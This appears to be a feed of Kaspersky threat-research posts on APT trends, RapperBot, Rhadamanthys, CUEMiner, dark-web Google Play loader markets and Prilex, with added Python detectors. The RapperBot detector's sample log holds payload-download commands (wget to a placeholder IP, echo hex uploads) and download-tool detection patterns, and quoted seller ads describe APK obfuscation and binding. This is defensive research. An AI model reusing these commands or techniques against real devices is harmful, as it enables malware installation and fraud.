DTrack is a backdoor that has been used by Andariel (aka Stonefly and Silent Chollima), a subset of Lazarus, for almost a decade in a wide variety of attacks, including deploying ransomware as well as espionage malware. In our previous publication about DTrack, we discussed how the backdoor evolved from its previous versions to the current version in use, as well as the new victimology. In our latest private report, we revisited a campaign from 2022 and expanded on the commands the attackers used to deploy DTrack and on the accompanying post-exploitation tools and malware (e.g., 3proxy and Yamabot) deployed thereafter. We identified that the attackers probably exploited servers running vulnerable versions of Log4j to gain an initial foothold, as others have reported. Furthermore, investigating the attacker’s infrastructure helped connect additional Yamabot infections with this incident. We identified several target profiles for related Yamabot deployments, all operating in the scientific research field (biomedical, genetics and soil sciences, and energy).

Other interesting discoveries

In March, we discovered a new malware strain actively targeting a government entity in Pakistan. We designated this malware “DreamLand”. The malware is modular and utilizes the Lua scripting language in conjunction with its Just-in-Time (JIT) compiler to execute malicious code that is difficult to detect. It also features various anti-debugging capabilities and employs Windows APIs through Lua FFI, which utilizes C language bindings to carry out its activities. This is the first time we have seen Lua used by an APT threat actor since its use by AnimalFarm and Project Sauron.

Final thoughts

While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organization or compromising an individual’s device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.

Here are the main trends that we’ve seen in Q1 2023:

  • Established threat actors such as Turla, MuddyWater, Winnti, Lazarus and ScarCruft continue to develop their toolsets.
  • There have also been campaigns from newly discovered threat actors such as Trila.
  • We continue to see threat actors using a variety of different programming languages, including Go, Rust and Lua.
  • APT campaigns continue to be very geographically dispersed. This quarter, we have seen actors focus their attacks on Europe, the US, the Middle East and various parts of Asia.
  • The targets chosen by APT threat actors are equally diverse. They include government and diplomatic bodies, aviation, energy, manufacturing, real estate, finance, telecoms, scientific research, IT and gaming sectors.
  • Geo-politics remains a key driver of APT development and cyber-espionage continues to be a prime goal of APT campaigns.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

Disclaimer: when referring to APT groups as Russian-speaking, Chinese-speaking or “other-speaking” languages, we refer to various artefacts used by the groups (such as malware debugging strings, comments found in scripts, etc.) containing words in these languages, based on the information we obtained directly or that is otherwise publicly known and widely reported. The use of certain languages does not necessarily indicate a specific geographic relation, but rather points to the languages that the developers behind these APT artefacts use.

Uncommon infection methods—part 2
https://securelist.com/crimeware-report-uncommon-infection-methods-2/109522/
Thu, 13 Apr 2023 08:00:32 +0000

Introduction

Although ransomware is still a hot topic on which we will keep on publishing, we also investigate and publish about other threats. Recently we explored the topic of infection methods, including malvertising and malicious downloads. In this blog post, we provide excerpts from the recent reports that focus on uncommon infection methods and describe the associated malware.

For questions or more information on our crimeware reporting service, please contact crimewareintel@kaspersky.com.

RapperBot: “intelligent brute forcing”

RapperBot, based on Mirai (but with a different C2 command protocol), is a worm infecting IoT devices with the ultimate goal of launching DDoS attacks against non-HTTP targets. We observed the first sample in June 2022, when it was targeting SSH and not Telnet services. The latest version, however, removed the SSH functionality and now focuses exclusively on Telnet—with quite some success. In Q4 2022, we noticed 112k RapperBot infection attempts coming from over 2k unique IP addresses.

What sets RapperBot apart from other worms is its “intelligent” way of brute forcing: it checks the prompt and, based on the prompt, it selects the appropriate credentials. This method speeds up the brute forcing process significantly because it doesn’t have to go over a huge list of credentials.

RapperBot then determines the processor architecture and infects the device. The actual malware is downloaded with one of a variety of possible commands (for example, wget, curl, tftp or ftpget). If for some reason none of these methods works, a malware downloader is uploaded to the device via shell echo commands.
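
Seen from a Telnet honeypot, the behaviour described above leaves a recognisable trace: a login that succeeds after only one or two guesses (prompt-aware credential selection rather than a long list), followed by an architecture probe and a download stage. The Python below is an added example, not RapperBot code and not part of the original report: a small detector run over constructed honeypot log lines that flags exactly those indicators, including the echo-based upload fallback. The log line format, the "quick success" threshold and the addresses (RFC 5737 documentation ranges) are assumptions made for this example.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample of Telnet honeypot events. The line format
# "<timestamp> <source-ip> <event> <detail>" and every address are assumptions
# made for this example.
SAMPLE_LOG = """\
2023-01-10T10:00:00Z 203.0.113.5 prompt BusyBox login:
2023-01-10T10:00:01Z 203.0.113.5 login-failed root:admin
2023-01-10T10:00:02Z 203.0.113.5 login-ok root:guess2
2023-01-10T10:00:03Z 203.0.113.5 cmd cat /proc/cpuinfo
2023-01-10T10:00:04Z 203.0.113.5 cmd wget http://198.51.100.7/x -O /tmp/.x
2023-01-10T10:00:05Z 203.0.113.5 cmd chmod +x /tmp/.x
2023-01-10T10:01:00Z 198.51.100.23 prompt login:
2023-01-10T10:01:01Z 198.51.100.23 login-failed admin:admin
2023-01-10T10:01:02Z 198.51.100.23 login-failed admin:1234
2023-01-10T10:01:03Z 198.51.100.23 login-failed admin:pass
2023-01-10T10:01:04Z 198.51.100.23 login-failed admin:guest
2023-01-10T10:01:05Z 198.51.100.23 login-failed admin:user
2023-01-10T10:02:00Z 192.0.2.9 prompt login:
2023-01-10T10:02:01Z 192.0.2.9 login-ok support:guess1
2023-01-10T10:02:02Z 192.0.2.9 cmd uname -m
2023-01-10T10:02:03Z 192.0.2.9 cmd echo -ne '\\x7f\\x45\\x4c\\x46' > /tmp/.d
2023-01-10T10:02:04Z 192.0.2.9 cmd echo -ne '\\x01\\x01\\x01\\x00' >> /tmp/.d
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) (?P<event>\S+)(?: (?P<detail>.*))?$")
# Download stage named in the report: wget, curl, tftp or ftpget.
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
# Fallback: a downloader written to disk with echo and hex escapes.
ECHO_UPLOAD_RE = re.compile(r"\becho\s+-n?e\b.*\\x[0-9a-fA-F]{2}")
# Architecture determination before the right binary is fetched.
ARCH_PROBE_RE = re.compile(r"/proc/cpuinfo|\buname\b")
# A login that succeeds within this many tries is treated as prompt-aware
# guessing rather than list-driven brute forcing (heuristic; an assumption).
QUICK_SUCCESS_MAX_TRIES = 2


@dataclass
class Session:
    prompt: str = ""
    attempts: int = 0
    success_at: Optional[int] = None  # 1-based attempt number of first success
    commands: List[str] = field(default_factory=list)


def parse_sessions(log_text: str) -> Dict[str, Session]:
    """Group honeypot events by source IP into per-session state."""
    sessions: Dict[str, Session] = defaultdict(Session)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that do not follow the assumed format
        s = sessions[m["ip"]]
        event, detail = m["event"], m["detail"] or ""
        if event == "prompt":
            s.prompt = detail
        elif event in ("login-failed", "login-ok"):
            s.attempts += 1
            if event == "login-ok" and s.success_at is None:
                s.success_at = s.attempts
        elif event == "cmd":
            s.commands.append(detail)
    return dict(sessions)


def indicators(session: Session) -> List[str]:
    """Return the RapperBot-style indicators present in one session."""
    found: List[str] = []
    if session.success_at is not None and session.success_at <= QUICK_SUCCESS_MAX_TRIES:
        found.append("quick-success-login")
    joined = "\n".join(session.commands)
    if ARCH_PROBE_RE.search(joined):
        found.append("arch-probe")
    if DOWNLOAD_RE.search(joined):
        found.append("download-stage")
    if ECHO_UPLOAD_RE.search(joined):
        found.append("echo-upload-fallback")
    return found


def analyze(log_text: str) -> Tuple[dict, Dict[str, List[str]]]:
    """Summarise attempts per unique IP and list sessions that reached a payload stage."""
    sessions = parse_sessions(log_text)
    report = {ip: indicators(s) for ip, s in sessions.items()}
    suspects = sorted(
        ip for ip, ind in report.items()
        if "download-stage" in ind or "echo-upload-fallback" in ind
    )
    summary = {
        "attempts": sum(s.attempts for s in sessions.values()),
        "unique_ips": len(sessions),
        "suspects": suspects,
    }
    return summary, report


if __name__ == "__main__":
    summary, report = analyze(SAMPLE_LOG)
    print(summary)
    for ip, ind in report.items():
        print(ip, ind or "-")
```

The "attempts" and "unique_ips" counters are the same two numbers quoted above for Q4 2022 (infection attempts and distinct source addresses), so the summary is directly comparable with that telemetry; the per-session indicator list is what a SOC would pivot on to separate the sessions that reached a payload stage from plain credential guessing.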

Rhadamanthys: malvertising on websites and in search engines

Rhadamanthys is a new information stealer first presented on a Russian-speaking cybercriminal forum in September 2022 and offered as a MaaS platform. According to the author, the malware:

  • Is written in C/C++, while the C2 is written in Golang.
  • Is able to do a “stealthy” infection.
  • Is able to steal/gather information on CPU type, screen resolution, supported wallets, and so on.
  • Evades EDR/AV.
  • Has encrypted communication with the C2.

Despite the malware being advertised already in September 2022, we started to detect the first samples at the beginning of 2023. Although Rhadamanthys was using phishing and spam initially as the infection vector, the most recent method is malvertising.

Online advertising platforms offer advertisers the possibility to bid in order to display brief ads in search engines, such as Google, but also on websites, in mobile apps and more. Both search engine and website-based ad platforms are leveraged by Rhadamanthys. The trick is to display ads that appear to promote legitimate applications but in fact contain links to phishing websites. These phishing websites host fake installers, luring users into downloading and installing the malware.

While analyzing Rhadamanthys, we noticed a strong connection with Hidden Bee miner. Both samples use images to hide the payload inside and both have similar shellcodes for bootstrapping. Additionally, both use “in-memory virtual file systems” and utilize Lua to load plugins and modules.

Comparison between Rhadamanthys’s “prepare.bin” and Hidden Bee’s “preload” modules

CUEMiner: distribution through BitTorrent and OneDrive

In August 2021, a project called SilentCryptoMiner was started on GitHub, hosting the miner consisting of a downloader and the payload, the bot source and the compiled builder, as well as additional software, such as a system watcher. It has been constantly updated, with the latest update going back to October 31, 2022. The repository is popular with cybercriminals, as illustrated by the huge number of samples we detected that featured many small changes and were combined with different URLs and TTPs, making it clear that the malware is used by multiple groups in various ways concurrently.

During our investigation, we noticed two methods of spreading the malware. The first is via trojanized cracked software downloaded via BitTorrent. The other is via trojanized cracked software downloaded from OneDrive sharing networks. How victims are lured into downloading these cracked packages remains speculation, because we couldn’t find any direct links. Nevertheless, many crack sites these days do not immediately provide downloads. Instead, they point to Discord server channels for further discussion. This suggests some form of human interaction and social engineering.

The downloader is written in .NET and called CUEMiner. Despite being written in .NET, it is wrapped by a C++-based dropper, and it connects to a set of URLs, which varies from sample to sample, to download the miner and configuration settings. It also performs several checks to ensure it is running on a bare-metal system and not on a virtual machine. If all checks pass, the malware:

  • Reconfigures Windows Defender to exclude the user profile path and the entire system drive from scanning.
  • Fetches configuration details from a hardcoded URL and saves them in several places (for example, c:\logs.uce, %localappdata%\logs.uce).
  • Creates empty files and subdirectories in %ProgramData%\HostData to make the directory look benign.
  • Downloads the miner and watcher.
  • Performs a number of other actions; the full list can be found in our private report.

The watcher, as the name suggests, monitors the system. If it doesn’t detect any processes that consume a lot of system resources (for example, games), the miner software is launched. When a heavy process, such as a game, is started, the miner is stopped and only started again when that process exits. This is done in order to stay undetected on the system longer.
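
The exclusion change and the file artefacts listed above are what a responder would check first on a suspect host. The Python below is an added example, not CUEMiner code and not Kaspersky’s tooling: it audits a constructed host snapshot for Defender exclusions broad enough to cover the whole user profile or the whole system drive, and for the logs.uce configuration file and the %ProgramData%\HostData decoy directory. On a live Windows host the exclusion list would come from Get-MpPreference (its ExclusionPath property) and the file list from a directory walk; both are embedded here as constructed sample data, and the user profile and drive letter are assumptions.

```python
from pathlib import PureWindowsPath
from typing import Iterable, List, Tuple

# Constructed host snapshot (assumed data for this example). On a real host the
# exclusions come from `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath`
# and the file paths from a directory walk.
SAMPLE_EXCLUSIONS = [
    "C:\\Users\\alice",                       # entire user profile excluded
    "C:\\",                                   # entire system drive excluded
    "C:\\Program Files\\Vendor\\App\\cache",  # narrow exclusion, plausible
]
SAMPLE_FILES = [
    "C:\\logs.uce",
    "C:\\Users\\alice\\AppData\\Local\\logs.uce",
    "C:\\ProgramData\\HostData\\report.txt",
    "C:\\ProgramData\\HostData\\sub\\data.bin",
    "C:\\Windows\\System32\\notepad.exe",
]

# Artefacts named in the report: the configuration file name and the decoy directory.
CONFIG_FILE_NAMES = {"logs.uce"}
DECOY_DIRS = [PureWindowsPath("C:\\ProgramData\\HostData")]


def _covers(path: str, target: PureWindowsPath) -> bool:
    """True if `path` equals `target` or is one of its ancestors (case-insensitive)."""
    p = PureWindowsPath(path)
    return p == target or p in target.parents


def audit_exclusions(exclusions: Iterable[str], user_profile: str,
                     system_drive: str) -> List[Tuple[str, str]]:
    """Flag Defender exclusions that cover the whole system drive or user profile."""
    profile = PureWindowsPath(user_profile)
    drive = PureWindowsPath(system_drive)
    findings: List[Tuple[str, str]] = []
    for ex in exclusions:
        if _covers(ex, drive):
            findings.append((ex, "covers entire system drive"))
        elif _covers(ex, profile):
            findings.append((ex, "covers entire user profile"))
    return findings


def find_artifacts(files: Iterable[str]) -> List[Tuple[str, str]]:
    """Flag the configuration file name and anything under the decoy directory."""
    hits: List[Tuple[str, str]] = []
    for f in files:
        p = PureWindowsPath(f)
        if p.name.lower() in CONFIG_FILE_NAMES:
            hits.append((f, "CUEMiner configuration file name"))
        elif any(_covers(str(d), p) for d in DECOY_DIRS):
            hits.append((f, "inside the %ProgramData%\\HostData decoy directory"))
    return hits


def audit_host(exclusions: Iterable[str], files: Iterable[str],
               user_profile: str = "C:\\Users\\alice", system_drive: str = "C:\\") -> dict:
    """Combine both signals; either alone is weak, together they match the reported behaviour."""
    exclusion_findings = audit_exclusions(exclusions, user_profile, system_drive)
    artifact_hits = find_artifacts(files)
    verdict = "consistent with CUEMiner" if exclusion_findings and artifact_hits else "inconclusive"
    return {"exclusions": exclusion_findings, "artifacts": artifact_hits, "verdict": verdict}


if __name__ == "__main__":
    for key, value in audit_host(SAMPLE_EXCLUSIONS, SAMPLE_FILES).items():
        print(key, value)
```

Over-broad exclusions are worth alerting on in their own right, independently of this family: an exclusion for a profile root or a drive root disables scanning for everything a user can write, which is why the audit reports them before looking for the file artefacts.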

Conclusion

Open source malware is often used by less skilled cybercriminals, who typically lack the skills and contacts needed to conduct massive campaigns. Nevertheless, they can still be quite active and effective, as shown by the huge number of CUEMiner samples we detected. If, over the course of their criminal career, they gain more skills, such as programming and a better understanding of security, they often reuse and improve crucial parts of open source malware code.

Code reuse and rebranding are also common among cybercriminals. There are many ransomware variants that change names over time while mostly retaining the same code base. In other cases, cybercriminals re-use parts of the code in new campaigns. For example, the Rhadamanthys stealer features some code overlaps with the Hidden Bee malware. This suggests the involvement of at least one individual in the Rhadamanthys campaign who had also been involved in the development of Hidden Bee.

To protect yourself against these threats, intelligence reports can help. If you want to stay up to date on the latest TTPs used by criminals or have questions about our private reports, please contact crimewareintel@kaspersky.com.

Overview of Google Play threats sold on the dark web
https://securelist.com/google-play-threats-on-the-dark-web/109452/
Mon, 10 Apr 2023 08:00:02 +0000

In 2022, Kaspersky security solutions detected 1,661,743 malware or unwanted software installers targeting mobile users. Although the most common way of distributing such installers is through third-party websites and dubious app stores, their authors every now and then manage to upload them to official stores, such as Google Play. These are usually policed vigorously, and apps are pre-moderated before being published; however, the authors of malicious and unwanted software employ a variety of tricks to bypass platform checks. For instance, they may upload a benign application, then update it with malicious or dubious code, infecting both new users and those who have already installed the app. Malicious apps get removed from Google Play as soon as they are found, but sometimes only after having been downloaded a number of times.

With many examples of malicious and unwanted apps on Google Play being discovered after complaints from users, we decided to take a look at what the supply and demand of such malware on the dark web looks like. It is especially important to analyze how this threat originates, because many cybercriminals work in teams, buying and selling Google Play accounts, malware, advertising services, and more. It’s a whole underground world with its own rules, market prices, and reputational institutions, an overview of which we present in this report.

Methodology

Using Kaspersky Digital Footprint Intelligence, we were able to collect examples of offers of Google Play threats for sale. Kaspersky Digital Footprint Intelligence allows discreet monitoring of pastebin sites and restricted underground online forums to discover compromised accounts and information leakages. The offers presented in this report were published between 2019 and 2023 and were collected from the nine most popular forums for the purchase and sale of goods and services related to malware and unwanted software.

Key findings

  • The price of a loader able to deliver a malicious or unwanted app to Google Play ranges between $2,000 and $20,000.
  • To keep their activities low-profile, a large percentage of attackers negotiate strictly through personal messages on forums and messengers, for example, in Telegram.
  • The most popular application categories to hide malware and unwanted software include cryptocurrency trackers, financial apps, QR-code scanners and even dating apps.
  • Cybercriminals accept three main kinds of payment: a percentage of the final profit, subscription or rent, and one-time payment.
  • Cybercriminals offer to launch Google ads to attract more people to download malicious and unwanted apps. The cost of ads depends on the target country. Ads for users from the USA and Australia cost the most — up to about $1 (US).

Types of malicious services offered on the dark web

As on legitimate online marketplaces, the dark web has offers for customers with different needs and budgets. In the screenshot below, you can see an offer list that gives an overview of the different goods and services that may be needed to target Google Play users. The author of the list calls the prices too high; however, they do not contradict the prices we’ve seen in other dark web offers. The main products that attackers buy are developers’ Google Play accounts, which can be either hacked or registered by cybercriminals using stolen identities, as well as the source code of various tools that help the buyer upload their creations to Google Play. Services such as a VPS (Virtual Private Server, for $300), which the attackers use to control infected phones or to redirect user traffic, are also offered, as are web injections. A web injection is malicious functionality that monitors the victim’s activity and, if they open a web page that is of interest to the cybercriminals, replaces it with a malicious one. Such a feature is offered for $25–80 apiece.

A dark web service provider calls these prices too high, and indicates that they sell the same services cheaper

See translation

Here are the real product prices and how much money you need if you don’t choose me

  1. GP developer account ~ $60
  2. App source or expenses on merging a loader and an existing APK $4000 rent $20000 purchase
  3. VPS for the panel ~ $300
  4. VPS-proxy to redirect traffic ~ $100–300
  5. Domains ~ $5 per domain
  6. Loader development or rent ~ $2500–5000
  7. Bot development or rent ~ $1000–20,000
  8. Purchase or development of necessary web injections ~ $25–80 per injection. The more injections you have, the more you get from the installations
  9. Regular bot/loader cleanup (FUD) ~$300, encryption in online services ~$200
  10. Installations:
    • Traffic purchase for the GP loader
    • Installations purchase ~$1/installation; you can start with 300 installations to warm up the loader and assess their persistence => $300
    • Direct messaging
    • Email spam (forget about APK being undetectable)

Let’s take a look at some specific programs and services that cybercriminals offer for sale.

Google Play loaders

In most of the offers we analyzed, attackers sell Google Play loaders, programs whose purpose is to inject malicious or unwanted code into a Google Play app. This app is then updated on Google Play, and the victim may download the malicious update onto their phone. Depending on what exactly was injected into the app, the user may receive the final payload with the update or get a notification prompting them to enable installation of unknown apps and install it from an external source. In the latter case, the notification does not disappear until the user agrees to install the additional app. After installing the app, the user is asked for permissions to access key data on the phone, such as Accessibility Services, camera, microphone, etc. The victim may not be able to use the original legitimate app until they grant the permissions required to perform malicious activities. Once all the requested permissions are granted, the user is finally able to use the app’s legitimate features, but at that moment their device becomes infected.

To convince the buyer to purchase their loaders, cybercriminals sometimes offer to provide a video demonstration, as well as to send a demo version to the potential client. Among the loader features, their authors may highlight the user-friendly UI design, convenient control panel, victim country filter, support for the latest Android versions, and more. Cybercriminals may also supplement the trojanized app with functionality for detecting a debugger or sandbox environment. If a suspicious environment is detected, the loader may stop its operations, or notify the cybercriminal that it has likely been discovered by security investigators.

Google Play loaders are the most popular offer on the dark web among Google Play threats

Often loader authors specify the types of legitimate apps their loaders work with. Malware and unwanted software is frequently injected into cryptocurrency trackers, financial apps, QR-code scanners and even dating apps. Cybercriminals also highlight how many downloads the legitimate version of the target app has, which means how many potential victims can be infected by updating the app with malicious or unwanted code. Most frequently, sellers promise to inject code into an app with 5,000 downloads or more.

Cybercriminals sell a Google Play loader injecting code into a cryptocurrency tracker

Binding service

Another frequent offer on the dark web is binding services. In essence, these do exactly the same thing that Google Play loaders do — hide a malicious or unwanted APK file in a legitimate application. However, unlike a loader, which adapts the injected code to pass the security checks on Google Play, a binding service inserts malicious code into an app that is not necessarily suitable for the official Android marketplace. Often, malicious and unwanted apps created with a binding service are distributed through phishing texts, dubious websites with cracked games and software, and more.

As binding services have a lower successful installation rate than loaders, the two differ greatly in price: a loader can cost about $5,000, while a binding service usually costs about $50–$100 per file.

Seller’s description of a binding service

See translation

We present for your consideration an APK binding service.

What is APK binding for? In a nutshell, binding allows attackers to install a bot to gain more trust from the victim, who is loyal to the legitimate app that the Android bot is bound to.

In creating this binding service, our main goal was to create a universal binder that would allow binding an Android bot to any legitimate application.

The main condition for enabling binding is the possibility to decompile a legitimate app and then compile it back using apktool.

Our binder’s main ADVANTAGES:

  • Runtime/scantime FUD

    Runtime cleanness is achieved by encrypting the Android bot with our cryptor BEFORE binding. It is also clear of alerts from Google Protect and built-in antivirus on devices from different vendors.

  • Most recent Android version support

    The binder is compatible with Android 7 and higher

  • Dynamic bot launch

    What is it for? After a successful installation, the victim may tap Done instead of Open, and such installation is of no use. The binder dynamically launches the bot, no matter what the victim taps.

The binder’s main operating principle is that when the legitimate application is launched, it prompts the user to allow installation from unknown sources on a timer using social engineering, so that the bot can be installed. If the user rejects this, they receive another request after some time. Upon successful installation, the binder dynamically launches the bot.

This service is provided manually via jabber.

The advantages and features of binding services listed in sellers’ ads are often similar to those of loaders. Binders usually lack Google Play-related features, though.

Malware obfuscation

The purpose of malware obfuscation is to bypass security systems by complicating malicious code. In this case, the buyer pays either for processing a single application, or for a subscription, for example, once per month. The service provider may even offer discounts for the purchase of packages. For example, one of the sellers offers obfuscation of 50 files for $440, while the cost of processing only one file by the same provider is about $30.

Google Play threat obfuscation offer for $50 apiece

See translation

Hi everyone,

We obfuscate your APK files, so Google Play Protect lets them pass (allowlist certificate).

[IMG link]

This is not our case.

We are now working in manual test mode, later the process will be fully automated.

We offer:

  • manifest morph (packagename, random activities, class, etc)
  • text string morph on the Smali code level (encryption with random key with Base encoding)
  • resource name morph (optional)
  • manifest and code part obfuscation on the Smali code level
  • complicated trash Smali opcode generation (optional)
  • trusted certificate accepted by Google Play Protect

Output:

  • antivirus check scan to monitor possible false positives
  • encrypted APK

Price:

1 file – $50

Service plans will be available when the site and API are ready

Payment accepted in BTC only

Contacts:

  • email
  • PM

Restrictions:

  • APK max size – 5MB
  • Important! Uploading files obfuscated by our service to VirusTotal is prohibited (checking via hash).
  • Important! The service doesn’t support apps that can damage CIS users (strings are automatically checked against a denylist)
  • Important! The service has the right to refuse app obfuscation without any explanation
  • Important! The service has the right to review the prices in the future

Installations

To increase the number of downloads of a malicious app, many attackers offer to purchase installations by increasing app traffic through Google ads. Unlike other dark web offers, this service is completely legitimate and is used to attract as many downloads of the application as possible, no matter if it is a still-legitimate application or an already poisoned one. Installation costs depend on the targeted country. The average price is $0.5, with offers ranging from $0.1 to $1. In the screenshot below, ads for users from the USA and Australia cost the most — $0.8.

Seller specifies the installation price for each country

See translation

Increase installations of your Android app from Play Market through Google Ads (UAC).

Other services

Dark web sellers also offer to publish the malicious or unwanted app for the buyer. In this case, the buyer does not interact directly with Google Play, but can remotely receive the fruits of the app’s activity, for example, all victim data stolen by it.

Average prices and common rules of sale

Kaspersky experts analyzed the prices in dark web ads offering Google Play-related services, and found that fraudsters accept different payment methods. The services can be provided for a share of the final profit, rented, or sold for a one-time price. Some sellers also hold auctions of their goods: since the number of items sold is limited, they are not very likely to be discovered, so buyers may be willing to compete for them. For example, in one of the auctions we found, the bidding for a Google Play loader started at $1,500, the bid increment (step) was equal to $200, and the “blitz” — the instant purchase price — was $7,000.

Cybercriminals auction a Google Play loader

Google Play Loader source, ver №2

The loader uses minimum rights, doesn’t require special rights that need permission to be granted, the traffic between the loader and the server is AES-128 encrypted with an encryption key generated once after registration, and a dynamically used initialization vector (IV). Contacts admin panel every 10 seconds. Searches for APK to install every 60 seconds. If an APK is already installed, the loader starts it one time. The loader doesn’t bother users, but subtly asks to install the app. Stable launch after reboot. Adapted for uploading to Google Play. Evasion methods for functionality restrictions on the device are implemented. Offline when the screen is off (loader doesn’t need to stay online). Anti-emulator and Google geo IP check. Blocked in CIS. Convenient admin panel.

I mentioned the reason for selling in the source sale topic.

Variant 2

The payload is a module (dex) file, AES-128 encrypted, injected into the legit app resources. It is loaded when the app is launched (loading into memory, decryption and dumping into the app’s internal storage). Not for Google Play, blocks 80% of apps with Class Dex Loader.

Start: $1,500

Step: $200

Blitz: $7k

The bidding ends in 12 hours after the last bid.

You are welcome to use an escrow service

The offered blitz price is not the highest. Prices for loaders we observed on dark web forums range between $2,000 and $20,000, depending on the malware complexity, novelty and prevalence, as well as the additional functions. The average price for a loader is $6,975.

Example of average offer for a Google Play loader

However, if cybercriminals want to buy the loader source code, the price immediately rockets, reaching the upper limit of the price range.

Seller offers a Google Play loader source code for $20,000

As opposed to a loader, a Google Play developer account (either hacked or newly created by the cybercriminals) can be bought quite cheaply, for example, for $200, and sometimes even for as little as $60. The price depends on the account features, such as the number of already published apps, number of their downloads, etc.

User wants to buy a Google Play account with access to the developer’s email

In addition to the many offers for sale, we also found numerous messages on the dark web about wanting to buy a particular product or service for a certain price.

Cybercriminal looking for a new Google Play loader

User wants to buy a new loader because their developer “went on a binge”

Need a loader

Enough experience, current coder went on a binge, and we’re in search of an alternative

We know prices and the market, won’t rob you, from $7k to your price

DM your offers

Deposit on our side or with an escrow service

How deals are made

Sellers on the dark web offer whole packages of different tools and services. To keep their activities low-profile, a large percentage of attackers negotiate strictly through private messages on dark web forums or personal messages on social networks and in messengers, for example in Telegram.

It may seem that service providers could easily deceive buyers and profit from their apps themselves, and often this is the case. However, it is also common for dark web sellers to maintain a reputation, offer guarantees, or accept payment only after the terms of the agreement have been fulfilled. To reduce risk when making deals, cybercriminals often resort to disinterested intermediaries: escrow services or middlemen. An escrow may be a dedicated service supported by a shadow platform, or a third party with no stake in the outcome of the transaction. Note, however, that nothing on the dark web fully eliminates the risk of being scammed.

Conclusion and recommendations

We continuously monitor the mobile threat landscape to keep our users safe and informed of the most important developments. Not long ago, we published a report about the threats smartphone users faced in 2022. However, looking at the volume of supply and demand of such threats on the dark web, we can assume that the number of threats in the future will only grow — and become more complex and advanced.

To stay protected from mobile threats:

  • Do not enable the installation of unknown apps. If some app urges you to do it, it is most likely infected. If it is possible, uninstall the app, and scan the device with an antivirus.
  • Check the permissions of the apps that you use and think carefully before granting an app permissions it doesn’t need to perform its main functions, especially when it comes to high-risk permissions such as Accessibility Services. The only permission that a flashlight app needs is to use the flashlight.
  • Use a reliable security solution that can help you to detect malicious apps and adware before they start misbehaving on your device.
  • Update your operating system and important apps as soon as updates become available. To be sure that an app update is benign, enable automatic system scan in your security solution, or scan the device right after the updates are installed.

For organizations, it is necessary to protect their developer accounts with strong passwords and 2FA, as well as monitor the dark web to detect and mitigate credential leaks as early as possible.

To inquire about Kaspersky threat monitoring services for your organization, please contact us at dfi@kaspersky.com.

Prilex modification now targeting contactless credit card transactions
https://securelist.com/prilex-modification-now-targeting-contactless-credit-card-transactions/108569/
Tue, 31 Jan 2023 08:00:41 +0000

Prilex is a singular threat actor that has evolved from ATM-focused malware into unique modular PoS malware—actually, the most advanced PoS threat we have seen so far, as described in a previous article. Forget about those old memory scrapers seen in PoS attacks. Prilex goes beyond these, and it has evolved very differently. This is highly advanced malware adopting a unique cryptographic scheme, doing real-time patching in target software, forcing protocol downgrades, manipulating cryptograms, doing GHOST transactions and performing credit card fraud—even on cards protected with the so-called unhackable CHIP and PIN technology. And now, Prilex has gone even further.

A frequent question asked about this threat was whether Prilex was able to capture data coming from NFC-enabled credit cards. During a recent Incident Response for a customer hit by Prilex, we were able to uncover three new Prilex versions capable of blocking contactless payment transactions, which became very popular in the pandemic times.

This blog post covers the NFC-related capabilities of recent Prilex modifications.

Tap-to-pay

Contactless payment systems are composed of credit and debit cards, key fobs, smart cards, or other devices, including smartphones and other mobile devices that use radio-frequency identification (RFID) or near-field communication (NFC, implemented in Samsung Pay, Apple Pay, Google Pay, Fitbit Pay, or any bank mobile application that supports contactless) for making secure payments.

The embedded integrated circuit chip and antenna enable consumers to pay by waving their card, fob, or handheld device over a reader at a point-of-sale terminal. Contactless payments are made in close physical proximity, unlike other types of mobile payments that use broad-area cellular or WiFi networks and do not require close physical proximity.

Different ways of tap-to-pay, but only one technology: NFC


Here is how they work:

  • To make a payment with a contactless credit card, the cardholder simply holds the card close to the contactless-enabled payment terminal (usually within a few inches).
  • The terminal sends a radio frequency (RF) signal to the card, activating the RFID chip embedded in the card.
  • The RFID chip in the card sends a unique identification number (ID) and transaction information to the terminal. The transaction data is non-reusable, so even if cybercriminals steal it, they cannot use it to steal money. Neither can they access the RFID chip to tamper with the data generation processes.
  • The terminal sends the transaction information to the card issuer’s processing network for authorization.
  • If the transaction is approved, the terminal usually displays a confirmation message, and the payment is processed.

The pandemic gave a boost to NFC payments

The size of the global market for contactless payments was estimated at $34.55 billion in 2021 and is expected to keep growing at a compound annual growth rate of 19.1% from 2022 to 2030, according to GrandView Research. The market was dominated by the retail segment, which accounted for more than 59.0% of global contactless revenue in 2021. Recent years saw an increase in the number of retail tap-and-go transactions: retailers can clearly see the benefits of contactless payments, which reduce transaction time, increase revenue, and improve operational efficiency. As stated in a Mastercard global study covering the year 2020, 74.0% of retailers expressed the intention to continue using contactless payments beyond the pandemic.

According to the US Payments Forum, Visa reports that in the U.S., tap-to-pay accounts for 28% of all face-to-face transactions, five times the pre-pandemic levels, while Mastercard says that 82% of card-present transactions in the country are happening at contactless-enabled locations. In Australia, contactless payments were growing in popularity even before the pandemic, with four out of five point-of-sale purchases being contactless in 2019. In the coming years, the popularity of this payment method is expected to grow even more everywhere in the world.

Contactless credit cards offer a convenient and secure way to make payments without the need to physically insert or swipe the card. But what happens if a threat can disable these payments in the EFT software running on the PoS computer and force you to insert the card into the PIN pad reader?

Insert-to-get-robbed

We have observed three new Prilex versions in the wild and managed to obtain the latest one (version 06.03.8080). The two others are 06.03.8070 and 06.03.8072.

The obtained version was discovered as recently as November 2022 and appears to originate from a different codebase than the others we found at the beginning of that year. Prilex now implements a rule-based file that specifies whether or not to capture credit card information and an option to block NFC-based transactions.

Excerpt from a Prilex rules file referencing NFC blocking

The reason is that NFC-based transactions often generate a unique ID or card number valid for only one transaction. If Prilex detects an NFC-based transaction and blocks it, the EFT software programs the PIN pad to show the following message:

Prilex fake error displayed on the PIN pad reader that says, “Contactless error, insert your card”

